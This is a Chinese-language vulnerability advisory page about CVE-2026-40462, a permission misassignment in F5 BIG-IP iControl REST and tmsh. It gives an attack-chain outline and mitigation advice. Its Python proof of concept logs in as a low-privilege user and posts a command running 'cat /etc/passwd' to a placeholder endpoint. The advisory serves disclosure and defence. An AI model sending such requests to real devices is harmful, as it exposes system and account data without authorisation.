IPBUF安全漏洞报告
English
CVE-2026-40462 CVSS 6.5 中危

CVE-2026-40462 F5 iControl REST权限错误致信息泄露

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-40462
漏洞类型
权限管理错误
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
F5 BIG-IP (iControl REST / TMOS Shell)

相关标签

权限管理错误信息泄露F5 BIG-IPiControl RESTTMOS中危

漏洞概述

F5 BIG-IP产品的iControl REST接口和TMOS Shell (tmsh)中存在权限分配错误的漏洞。由于未公开的特定命令配置不当,拥有低权限的经过身份验证的攻击者可以利用此漏洞绕过安全检查,从而访问本不应可见的敏感信息。该漏洞的CVSS v3.1评分为6.5,属于中危级别。攻击者无需用户交互即可通过网络发起攻击,主要影响数据的机密性,对完整性和可用性无直接影响。F5官方指出,已达到技术支持终止(EoTS)的软件版本不在评估范围内。

技术细节

该漏洞源于F5 BIG-IP系统在iControl REST架构及TMOS Shell (tmsh)中对特定未公开命令的访问控制列表(ACL)或角色权限检查存在逻辑缺陷。在正常的安全模型中,敏感的系统配置命令或信息读取命令应当仅限于高权限管理员账户(如Administrator角色)执行。然而,由于权限实现的不正确,系统错误地将执行或读取权限赋予了低权限用户(如仅具备应用查看权限的账户)。攻击者首先需要拥有有效的F5设备凭证并完成身份认证。随后,攻击者可以通过向iControl REST API发送特制的HTTP POST/GET请求,或者在tmsh命令行界面中调用该特定命令。由于后端服务未正确验证当前会话的角色权限,命令被成功执行,导致返回敏感的系统信息(如配置详情、账户信息等)。此漏洞不涉及内存破坏或代码执行,纯粹是业务逻辑层面的权限越界。

攻击链分析

STEP 1
侦察与认证
攻击者获取目标F5 BIG-IP设备的低权限账户凭证,并通过iControl REST接口或SSH进行身份验证。
STEP 2
漏洞利用
攻击者利用权限分配错误,向受影响的未公开命令端点发送特制请求,或通过tmsh执行特定命令。
STEP 3
信息泄露
系统由于未正确校验权限,执行了请求并返回了敏感信息(如配置文件、密钥或其他受限数据)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # F5 BIG-IP iControl REST Permission Misconfiguration PoC # Target: CVE-2026-40462 def check_vulnerability(target_ip, username, password): session = requests.Session() session.verify = False # Ignore SSL warnings for internal testing # 1. Authenticate to iControl REST API auth_url = f"https://{target_ip}/mgmt/shared/authn/login" auth_payload = { "username": username, "password": password, "loginProviderName": "tmos" } try: print("[*] Attempting authentication...") response = session.post(auth_url, json=auth_payload) if response.status_code != 200: print(f"[-] Authentication failed: {response.text}") return token = response.json().get('token', {}).get('token') headers = { "X-F5-Auth-Token": token, "Content-Type": "application/json" } print("[+] Authentication successful.") # 2. Exploit Permission Misassignment on Undisclosed Command # Note: Replace 'vulnerable_command_uri' with the actual endpoint found in the advisory exploit_url = f"https://{target_ip}/mgmt/tm/util/vulnerable_command_uri" # Payload attempting to read sensitive info exploit_payload = { "command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'" # Example sensitive read } print(f"[*] Sending exploit payload to {exploit_url}...") exploit_response = session.post(exploit_url, headers=headers, json=exploit_payload) # 3. Check if sensitive info is returned if exploit_response.status_code == 200 and "root:" in exploit_response.text: print("[!] VULNERABILITY CONFIRMED: Sensitive data leaked!") print("[+] Response:", exploit_response.text) else: print("[-] Vulnerability not exploited or permission denied.") print("[-] Status Code:", exploit_response.status_code) except Exception as e: print(f"[-] An error occurred: {str(e)}") if __name__ == "__main__": target = "192.168.1.1" # Replace with target IP user = "low_priv_user" # Replace with low-priv user pwd = "password" # Replace with password check_vulnerability(target, user, pwd)

影响范围

F5 BIG-IP (具体受影响版本请参考官方公告 K000156581)

防御指南

临时缓解措施
在无法立即安装补丁的情况下,建议通过防火墙或自我IP限制严格限制对iControl REST服务(通常为TCP 443端口)和SSH端口的访问来源,仅允许必要的管理终端连接。此外,应加强账户安全策略,确保所有低权限账户未被授予超出其职责范围的系统访问权限,并密切关注F5发布的安全更新通告。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表